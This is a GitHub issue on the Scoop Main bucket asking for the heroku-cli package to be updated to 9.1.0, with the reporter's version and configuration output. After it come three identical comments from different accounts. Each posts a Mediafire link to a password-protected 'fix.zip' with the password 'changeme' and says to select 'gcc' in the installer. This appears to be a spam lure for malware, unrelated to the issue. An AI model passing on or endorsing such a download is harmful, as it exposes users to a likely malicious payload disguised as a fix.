### ISSUE TITLE
[Bug]: Update heroku-cli@9.1.0

### ISSUE THREAD

**Issue by sayeed205** [ScoopInstaller/Main#6138]
### Prerequisites

- [X] I have written a descriptive issue title.
- [X] I have searched all issues/PRs to ensure it has not already been reported or fixed.
- [X] I have verified that I am using the latest version of Scoop and corresponding bucket.

### Package Name

heroku-cli

### Expected/Current Behaviour

Heroku-cli is not updated from a long time 
currently scoop installed version 7.69.1 but latest is 9.1.0 

### Steps to Reproduce

```console
scoop install heroku-cli
```

### Possible Solution

Update the package

### Scoop and Buckets Version

```console
scoop --version
Current Scoop version:
859d1db5 (HEAD -> master, tag: v0.5.2, origin/master, origin/HEAD) chore(release): Bump to version 0.5.2 (#6080)

'main' bucket:
593a5d5b0 (HEAD -> master, origin/master, origin/HEAD) stgit: Update to version 2.4.11

'extras' bucket:
d3fc9ee41 (HEAD -> master, origin/master, origin/HEAD) text-grab: Update to version 4.5.1

'java' bucket:
e20c4f00 (HEAD -> master, origin/master, origin/HEAD) temurin11-nightly-jre: Update to version 11.0.25-4.0.ea
```

### Scoop Config

```console
scoop config

last_update         aria2-warning-enabled scoop_repo                              scoop_branch
-----------         --------------------- ----------                              ------------
26-08-2024 09:31:26                 False https://github.com/ScoopInstaller/Scoop master
```

### PowerShell Version

```console
$PSVersionTable

Name                           Value
----                           -----
PSVersion                      7.4.4
PSEdition                      Core
GitCommitId                    7.4.4
OS                             Microsoft Windows 10.0.22631
Platform                       Win32NT
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0…}
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1
WSManStackVersion              3.0
```

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
